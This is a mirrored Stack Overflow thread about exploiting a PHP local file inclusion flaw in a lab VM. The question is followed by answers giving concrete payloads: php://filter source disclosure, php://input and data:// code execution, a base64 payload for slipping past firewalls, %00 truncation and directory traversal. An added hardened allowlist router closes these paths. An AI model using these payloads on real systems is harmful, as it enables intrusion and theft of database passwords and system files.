原文地址: http://stackoverflow.com/questions/20726247/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
PHP security exploit - list content of remote PHP file?
Asked by swiftcode
I'm trying to exploit some web vulnerabilities in a sample website running inside a VM (it is not available on the web - only for educational purposes). I have a php file named setupreset.php which has the information about MySQL configs, setup and passwords used to setup the website. This is in the same directory as the rest of the php files (index, products, forum, etc...).
This is the code of index.php, for reference:
<?php
include ("includes/header.php");
// Grab inputs
$page = $_GET['page'];            // untrusted: taken straight from the query string
if ($page == "") {
    include("home.html");
} else {
    include ($page . '.php');     // the vulnerable line: user input becomes an include path
}
include ("includes/footer.php");
?>
The main goal is to list the contents of the setupreset PHP file, or download it somehow. If I navigate to this file: http://10.211.55.5/index.php?page=setupreset, it gets executed, but the PHP code is naturally not shown, due to the fact that it is parsed by the PHP interpreter.
Now, the website uses PHP includes, so URLs look like this: http://10.211.55.5/index.php?page=products. This seems like it's vulnerable to remote file inclusion, where I could simply point to another PHP page, e.g. http://10.211.55.5/index.php?page=http://badwebsite.com/myevilscript.php but allow_url_include is off and cannot be changed, so this won't work (I tried this). However, allow_url_fopen is likely on (since it's on by default), so my question is the following: is it possible to upload a PHP file or some script that lists the content of setupreset.php using this kind of exploit?
Answered by CodeColorist
If allow_url_include is off, you can't execute remote code. But you can find other pages, for example a content management dashboard, to upload your code as "image", then find the actual path and include it.
And, there are still ways to exploit.
Let's look inside your code. You may notice that it automatically adds an extension .php at the end of the path. So you should remove php in the GET param. But what if the file you want to include does not have a PHP extension? Then use %00 to terminate the string, such as
http://localhost/include.php?page=../uploads/your_uploaded_fake_image.jpg%00
There's a special protocol in PHP, powerful and dangerous. It's php://.
You can check out the official manual for detailed information, and here I'll show you some cases to make a file inclusion vulnerability become source disclosure and even remote code execution vulnerabilities.
Before your test, I suggest you use Firefox with the HackBar plugin. It's a powerful penetration testing suite.
- Source disclosure
This feature doesn't need url inclusion allowed.
php://filteris a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read. (Reference)
Then you can see the source of secret.inc.php in the same directory via the following request.
http://localhost/include.php?page=php://filter/read=convert.base64-encode/resource=secret.inc


File content will be encoded in base64, so it does support binary files.
It's powerful to get sensitive information, such as database passwords or an encryption key! If privilege is not properly configured, it can even jump out of the cage and extract data from files in outer directories, like /etc/passwd!
- Remote code execution
Actually you can't exploit this way, because allow_url_include is Off in this case.
But I must point it out because it's magical!
It's completely different from local include. It doesn't need to upload any file to a remote server or so. All you need is one single request.
php://input can access the raw HTTP request body, so what does include("php://input") do? Just visit http://localhost/include.php?page=php://input, with valid PHP code in the request body, then you can execute any (allowed) function on the remote server!


Don't forget the %00 to drop the .php tail.
Besides, PHP supports data://URL scheme. You can directly put code in GET param! The following test doesn't need any special tool, just a normal browser can execute an attack.
http://localhost/include.php?page=data:text/plaintext,<?php phpinfo();?>
Some Web Application Firewalls may detect suspected strings in the URL and block evil requests, they won't leave the phpinfo alone. Is there a way to encrypt? Of course. data:// URL supports at least base64 encoding...
http://localhost/include.php?page=data:text/plain;base64, PD9waHAgcGhwaW5mbygpOyA/Pg==
And you will get familiar phpinfo once again!


Note
The null byte trick (%00) does not work anymore for PHP >= 5.3.4: http://blog.benjaminwalters.net/?p=22139
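As an added example (not code from the question or from any of the answers), here is a hardened version of the router from the question that closes every path the answer above walks through: the php://filter and php://input wrappers, data: URLs, the %00 terminator and ../ traversal. It assumes a pages/ directory holding the routable pages and a hand-written allowlist of slugs; both are assumptions for the demo.

```php
<?php
// Added example (not the question's or any answer's code): a hardened router that
// replaces `include ($page . '.php')`. The ?page= value must match a fixed slug
// allowlist, so php://filter, php://input, data:, %00 and ../ never hit the
// filesystem. PAGES_DIR and the slug list are assumptions for this demo.

const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'products', 'forum']; // setupreset deliberately absent

// Policy check: is this a page we chose to expose?
function isAllowedPage(string $page): bool
{
    // A short lowercase slug only: this single test rules out scheme prefixes,
    // slashes, dots, NUL bytes and any attempt to smuggle in a suffix.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $page)) {
        return false;
    }
    return in_array($page, ALLOWED_PAGES, true);
}

// Turn an allowed slug into an absolute path under PAGES_DIR, or null to refuse.
function resolvePage(string $page): ?string
{
    $page = ($page === '') ? 'home' : $page;   // same default as the original index.php
    if (!isAllowedPage($page)) {
        return null;
    }
    // Defence in depth: realpath() collapses symlinks and "..", then we confirm
    // the result still lives inside PAGES_DIR before including it.
    $base = realpath(PAGES_DIR);
    $real = realpath(PAGES_DIR . '/' . $page . '.php');
    if ($base === false || $real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

if (PHP_SAPI === 'cli') {
    // Self-check with the inputs discussed on this page (constructed probes).
    $probes = ['products', 'setupreset', "setupreset\0",
        'php://filter/read=convert.base64-encode/resource=setupreset',
        'data:text/plain,<?php phpinfo();?>', '../uploads/fake_image.jpg'];
    foreach ($probes as $p) {
        printf("%-62s %s\n", addcslashes($p, "\0"), isAllowedPage($p) ? 'allowed' : 'rejected');
    }
} else {  // web request: the actual router
    $target = resolvePage((string) ($_GET['page'] ?? ''));
    if ($target === null) { http_response_code(404); exit('Not found'); }
    include 'includes/header.php'; include $target; include 'includes/footer.php';
}
```

Run it with `php index.php` from the command line to see only `products` accepted; every wrapper, NUL and traversal probe is rejected before any filesystem call, and the realpath containment check is a second line of defence if the allowlist is ever edited carelessly.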
Answered by nietonfir
Use a directory traversal and end your input string with a %00 NUL meta character (as mentioned on wikipedia).
http://example.com/index.php?page=setupreset%00
This will remove the ".php" suffix from the inclusion and might help you somehow.
Answered by Evert
It is not. The php file is getting executed because you call include, if you called readfile, file_get_contents or similar you could see the contents of the php file.

